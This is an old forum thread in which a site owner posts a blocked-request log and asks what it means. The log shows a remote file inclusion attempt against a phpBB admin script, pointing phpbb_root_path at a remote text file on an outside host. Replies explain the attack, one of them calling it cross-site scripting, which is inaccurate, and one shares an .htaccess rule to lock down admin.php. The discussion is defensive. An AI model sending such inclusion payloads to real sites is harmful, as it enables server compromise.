What are these exactly??? What r they trying to do?

Hangin' Around Joined: Dec 17, 2007 Posts: 29

Get a few of these on site and wondered what they were trying to do to the site???

Date & Time: 2008-01-24 18:09:58 UTC GMT +0000
Blocked IP: 80.67.27.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)
Query String: www.mydomain.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hapich.com/pix/admin/colombia/test.txt???
Get String: www.mydomain.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hapich.com/pix/admin/colombia/test.txt???
Post String: www.mydomain.com/modules/Forums/admin/admin_db_utilities.php
Forwarded For: none
Client IP: none
Remote Address: 80.67.27.39
Remote Port: 32913
Request Method: GET
--------------------
Who-Is for IP

Posted: Thu Jan 24, 2008 4:08 pm

See: http://www.ravenphpscripts.com/posts14294.html

Especially the reply from Montego;
(I had the same questions as well Wink

)

montego wrote:

They are absolutely NOT "innocent". Anything which attacks phpbb_root_path is far from innocent and I will not go into the explanation of why. phpBB has since plugged this particular hole (yes, RN has that "plug"), so these are old exploits. Just remember too that just because a file has .txt as an extension does not mean that is truly what the nature of the file is. It could even be PHP script or a binary etc. To answer your question, it is very possible that those sites were hacked and now being used to try and attack others.

Posted: Thu Jan 24, 2008 4:13 pm

So where exactly are they inputting these scripts????

Posted: Thu Jan 24, 2008 4:17 pm

They are trying to run those queries on your site, like you can see in the strings from your topicstart.

I guess that most of them are automated and are just being send to your website from another server, but please read the other topic cause a lot of it is explained over there Wink

registered · Posted: Thu Jan 24, 2008 7:39 pm

This is called a cross site scripting attack. They are trying to trick your PHP code to run a (bad) script on a remote server.

Posted: Fri Jan 25, 2008 12:46 pm

Where is it likely they are inputting these scripts, that is to say I had one hacker from Turkey once chat to me and tell me how he had hacked my site by typing some script into the search topic input field then he manage to retrieve the username and the hash (MD5) of my password which he pasted into a MD5 hash cracking website waited a few days then it told him my admin password. If I know where they are inputting the stuff I can remove it so that they can only do that when they are a registered/verified member.

registered · Posted: Fri Jan 25, 2008 2:45 pm

Search module is a previous known exploit. RavenNuke should have it patched already.
If they are still hacking your site and succeeding, please let us know

Posted: Sat Jan 26, 2008 3:30 am

Well thank god it seems to be blocking em each time but is a tad worrying to think its getting attacked on a regular basis.

Worker Joined: Aug 26, 2007 Posts: 236

rugbyleaguer wrote:

Where is it likely they are inputting these scripts, that is to say I had one hacker from Turkey once chat to me and tell me how he had hacked my site by typing some script into the search topic input field then he manage to retrieve the username and the hash (MD5) of my password which he pasted into a MD5 hash cracking website waited a few days then it told him my admin password. If I know where they are inputting the stuff I can remove it so that they can only do that when they are a registered/verified member.

On my site I have added in .htaccess, so only my ip-address can access admin.php. They have no use then of the admin password.

<Files "admin.php">
Order allow,deny
Allow from xxx.xx.x.xx
</Files>

xxx.xx.x.xx is my ip-address